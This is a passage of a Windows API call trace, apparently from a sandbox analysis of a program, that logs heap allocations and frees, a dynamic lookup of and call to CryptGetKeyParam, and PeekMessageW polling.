(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae928 [0030.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.142] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.142] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.144] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0030.145] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.147] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.147] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.149] RtlAllocateHeap 